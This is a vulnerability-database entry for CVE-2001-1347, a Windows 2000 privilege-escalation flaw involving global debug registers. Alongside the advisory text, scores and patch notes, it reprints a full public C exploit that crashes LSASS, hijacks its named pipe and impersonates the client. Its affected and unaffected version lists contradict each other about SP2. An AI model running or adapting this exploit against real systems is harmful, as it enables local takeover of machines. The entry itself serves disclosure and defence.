CVE-2001-1347
CVSS 4.6
Published: 2001-05-24 00:00:00
Last revised: 2008-09-05 16:26:19

[Original] Windows 2000 allows local users to cause a denial of service and possibly gain privileges by setting a hardware breakpoint that is handled using global debug registers, which could cause other processes to terminate due to an exception, and allow hijacking of resources such as named pipes.


[CNNVD] Microsoft Win2K privilege elevation via debug registers vulnerability (CNNVD-200105-095)

        CVE(CAN) ID: CAN-2001-1347

        If someone is able to run a program on the target Win2K system, they can elevate their privileges; at a minimum they can obtain write access to the %SystemRoot%\system32 directory and to the HKEY_CLASSES_ROOT branch of the registry.

        This is because the x86 debug registers DR0~DR7 are global across all processes, so a hardware breakpoint set in one process affects other processes and services. If the breakpoint is hit inside a service, a single-step exception is raised and that process/service is terminated. Once the service has been terminated, its trusted named pipe can be hijacked, and when another service writes to that named pipe, it becomes possible to impersonate that service.

        <* Source: Georgi Guninski (guninski@guninski.com) *>


- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1347
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1347
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-095
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2764
(VENDOR_ADVISORY)  BID  2764
http://www.iss.net/security_center/static/6590.php
(VENDOR_ADVISORY)  XF  win2k-debug-elevate-privileges(6590)
http://archives.neohapsis.com/archives/bugtraq/2001-05/0232.html
(UNKNOWN)  BUGTRAQ  20010524 Elevation of privileges with debug registers on Win2K

- Vulnerability information

Microsoft Win2K privilege elevation via debug registers vulnerability
Medium  Design error
2001-05-24 00:00:00 2005-05-13 00:00:00
Local

- Advisories and patches

        Vendor patches:

        Microsoft states that this issue is fixed in Win2K SP2, but this has not yet been confirmed.

        Microsoft SP2 download address:

        http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.asp

        
        
        

- Vulnerability information (20880)

MS Windows 2000 Debug Registers Vulnerability (EDBID:20880)
windows local
2001-05-24 Verified
0 Georgi Guninski
N/A
source: http://www.securityfocus.com/bid/2764/info

A vulnerability exists in the handling of debug registers in Windows 2000.

It is possible for unprivileged processes to create breakpoints for arbitrary processes. This can be used to 'kill' arbitrary processes without administrative privileges.

Since it is possible for an unprivileged process to terminate arbitrary processes, depending on the programs involved, this vulnerability could be used to leverage other attacks, including a denial of service or elevating privileges by 'impersonating' a trusted named pipe.

// Win2K elevation of privileges
// Written by Georgi Guninski http://www.guninski.com
// Kind of ugly but works
// Check the disclaimer and advisory at http://www.guninski.com/dr07.html

#define _WIN32_WINNT  0x0500

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

// may need to change below
///////////////////////////////
DWORD lsasspid=224; // pid of LSASS.EXE
//DWORD lsasspid=236; // pid of LSASS.EXE
DWORD MAGICESPINLSA=0x0053ffa0; // ESP in LSASS.EXE - may need to change it
//////////////////////////////

char szPipe[64]="\\\\.\\pipe\\lsass";
HANDLE hProc = NULL;
PROCESS_INFORMATION pi;


volatile int lsadied = 0;



unsigned long __stdcall threadlock(void *v)
{   
	Sleep(1000);
	LockWorkStation();
	return 0;
}

unsigned long __stdcall threadwriter(void *v)
{
	while(!lsadied)
	{
    FILE *f1;
	f1=fopen("\\\\.\\pipe\\lsass","a");
	 if (f1 != NULL)
		{
		 fprintf(f1,"A");
		 fclose(f1);
		}
/*
	 else
		 printf("%s\n","error writing to pipe");
*/
	Sleep(400);
	}
	printf("%s\n","Stop writing to pipe");
	return 0;
}

unsigned long __stdcall waitlsadie(void *v)
{

int lsadied2=0;
long ( __stdcall *NtQuerySystemInformation )( ULONG, PVOID, ULONG, ULONG ) = NULL;
if ( !NtQuerySystemInformation )
      NtQuerySystemInformation = ( long ( __stdcall * )( ULONG, PVOID, ULONG,
ULONG ) ) GetProcAddress( GetModuleHandle( "ntdll.dll" ),"NtQuerySystemInformation" );
typedef struct _tagThreadInfo
{
        FILETIME ftCreationTime;
        DWORD dwUnknown1;
        DWORD dwStartAddress;
        DWORD dwOwningPID;
        DWORD dwThreadID;
        DWORD dwCurrentPriority;
        DWORD dwBasePriority;
        DWORD dwContextSwitches;
        DWORD dwThreadState;
          DWORD dwWaitReason;
        DWORD dwUnknown2[ 5 ];
} THREADINFO, *PTHREADINFO;
#pragma warning( disable:4200 )
typedef struct _tagProcessInfo
{
        DWORD dwOffset;
        DWORD dwThreadCount;
        DWORD dwUnknown1[ 6 ];
        FILETIME ftCreationTime;
        DWORD dwUnknown2[ 5 ];
        WCHAR* pszProcessName;
        DWORD dwBasePriority;
        DWORD dwProcessID;
        DWORD dwParentProcessID;
        DWORD dwHandleCount;
        DWORD dwUnknown3;
        DWORD dwUnknown4;
        DWORD dwVirtualBytesPeak;
        DWORD dwVirtualBytes;
        DWORD dwPageFaults;
        DWORD dwWorkingSetPeak;
        DWORD dwWorkingSet;
        DWORD dwUnknown5;
        DWORD dwPagedPool;
        DWORD dwUnknown6;
        DWORD dwNonPagedPool;
        DWORD dwPageFileBytesPeak;
        DWORD dwPrivateBytes;
        DWORD dwPageFileBytes;
        DWORD dwUnknown7[ 4 ];
        THREADINFO ti[ 0 ];
} _PROCESSINFO, *PPROCESSINFO;
#pragma warning( default:4200 )



 PBYTE pbyInfo = NULL;
 DWORD cInfoSize = 0x20000;
while(!lsadied2)
{
 pbyInfo = ( PBYTE ) malloc( cInfoSize );
 NtQuerySystemInformation( 5, pbyInfo, cInfoSize, 0 ) ;
 PPROCESSINFO pProcessInfo = ( PPROCESSINFO ) pbyInfo;
 bool bLast = false;
 lsadied2 = 1;
 do {
	 if ( pProcessInfo->dwOffset == 0 )
         bLast = true;
     if (pProcessInfo->dwProcessID == lsasspid)
		 lsadied2 = 0 ;
     pProcessInfo = ( PPROCESSINFO ) ( ( PBYTE ) pProcessInfo + pProcessInfo->dwOffset );
    } while( bLast == false );
 free( pbyInfo );
}
printf("LSA died!\n");
lsadied=1;
return 0;
}



void add_thread(HANDLE thread)
{
		  CONTEXT ctx = {CONTEXT_DEBUG_REGISTERS};

//DR7=d0000540 DR6=ffff0ff0 DR3=53ffa0 DR2=0 DR1=0 DR0=0

    SuspendThread(thread);
    GetThreadContext(thread,&ctx);
	ctx.Dr7=0xd0000540;
	ctx.Dr6=0xffff0ff0;
	ctx.Dr3=MAGICESPINLSA;
	ctx.Dr2=0;
	ctx.Dr1=0;
	ctx.Dr0=0;
    SetThreadContext(thread, &ctx);
    ResumeThread(thread);
//    printf("DR7=%x DR6=%x DR3=%x DR2=%x DR1=%x DR0=%x\n",ctx.Dr7,ctx.Dr6,ctx.Dr3,ctx.Dr2,ctx.Dr1,ctx.Dr0);

}


unsigned long __stdcall threaddeb(void *v)
{
    STARTUPINFO si = {
        sizeof(STARTUPINFO)
    };


    CreateProcess(0,"c:\\winnt\\system32\\taskmgr.exe",0,0,0,
		CREATE_NEW_CONSOLE,0,0,&si,&pi);
	Sleep(2000);
    BOOL status = CreateProcess(
        0,
        "c:\\winnt\\system32\\calc.exe",
        0,0,0,
		DEBUG_PROCESS
        | DEBUG_ONLY_THIS_PROCESS
        | CREATE_NEW_CONSOLE,
        0,0,&si,&pi);

    if( !status )
    {
		printf("%s\n","error debugging");
		exit(1);
    }

    add_thread(pi.hThread);

    for( ;; )
    {
        DEBUG_EVENT de;
        if( !WaitForDebugEvent(&de, INFINITE) )
        {
		 printf("%s\n","error WaitForDebugEvent");
        }

        switch( de.dwDebugEventCode )
        {
        case CREATE_THREAD_DEBUG_EVENT:
            add_thread(de.u.CreateThread.hThread);
            break;
        }
    ContinueDebugEvent(de.dwProcessId,de.dwThreadId,DBG_CONTINUE);
	}

	return 0;
}

    int main(int argc,char* argv[])
    {
      DWORD dwType = REG_DWORD;
      DWORD dwSize = sizeof(DWORD);
	  DWORD dwNumber = 0;
      char szUser[256];

	exit(0);
      HANDLE hPipe = 0;

		if (argc > 1)
			lsasspid=atoi(argv[1]);
		if (argc > 2)
			sscanf(argv[2],"%x",&MAGICESPINLSA);

	  printf("Fun with debug registers. Written by Georgi Guninski\n");
	  printf("vvdr started: lsasspid=%d breakp=%x\n",lsasspid,MAGICESPINLSA);
   	  CreateThread(0, 0, &threadwriter, NULL, 0, 0);
	  CreateThread(0, 0, &waitlsadie, NULL, 0, 0);
	  CreateThread(0, 0, &threaddeb, NULL, 0, 0);

  	  while(!lsadied);

      printf("start %s\n",szPipe);
      hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                               PIPE_TYPE_MESSAGE|PIPE_WAIT,
                               2, 0, 0, 0, NULL);
      if (hPipe == INVALID_HANDLE_VALUE)
      {
        printf ("Failed to create named pipe:\n  %s\n", szPipe);
        return 3;
      }
	  CreateThread(0, 0, &threadlock, NULL, 0, 0);
	  ConnectNamedPipe (hPipe, NULL);
      if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
      {
        printf ("Failed to read the named pipe.\n");
        CloseHandle(hPipe);
        return 4;
      }

     if (!ImpersonateNamedPipeClient (hPipe))
      {
        printf ("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
      }
      dwSize  = 256;
      GetUserName(szUser, &dwSize);
      printf ("Impersonating dummy :) : %s\n\n\n\n", szUser);
// the action begins
	  FILE *f1;
	  f1=fopen("c:\\winnt\\system32\\vv1.vv","a");
		if (f1 != NULL)
		{
		 fprintf(f1,"lsass worked\n");
		 fclose(f1);
		 printf("\n%s\n","Done!");
		}
		else
		 printf("error creating file");
	fflush(stdout);
	HKEY mykey;
	RegCreateKey(HKEY_CLASSES_ROOT,"vv",&mykey);
	RegCloseKey(mykey);


    CloseHandle(hPipe);
    return 0;
    }
		

- Vulnerability information

13437
Microsoft Windows 2000 Debug Register Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-05-24 Unknown
2001-05-24 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

MS Windows 2000 Debug Registers Vulnerability
Design Error 2764
No Yes
2001-05-24 12:00:00 2009-07-11 06:06:00
Discovered and posted to Bugtraq by Georgi Guninski <guninski@guninski.com> on May 24, 2001.

- Affected versions

Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Advanced Server SP2

- Unaffected versions

Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Advanced Server SP2

- Exploit

Georgi Guninski <guninski@guninski.com> has provided the following exploit:

http://www.guninski.com/pipe3.cpp

- Solution

Microsoft has reported that Windows 2000 SP2 is not affected by this vulnerability.


Microsoft Windows 2000 Professional

Microsoft Windows 2000 Advanced Server SP1

Microsoft Windows 2000 Server SP1

Microsoft Windows 2000 Advanced Server

Microsoft Windows 2000 Professional SP1

Microsoft Windows 2000 Server
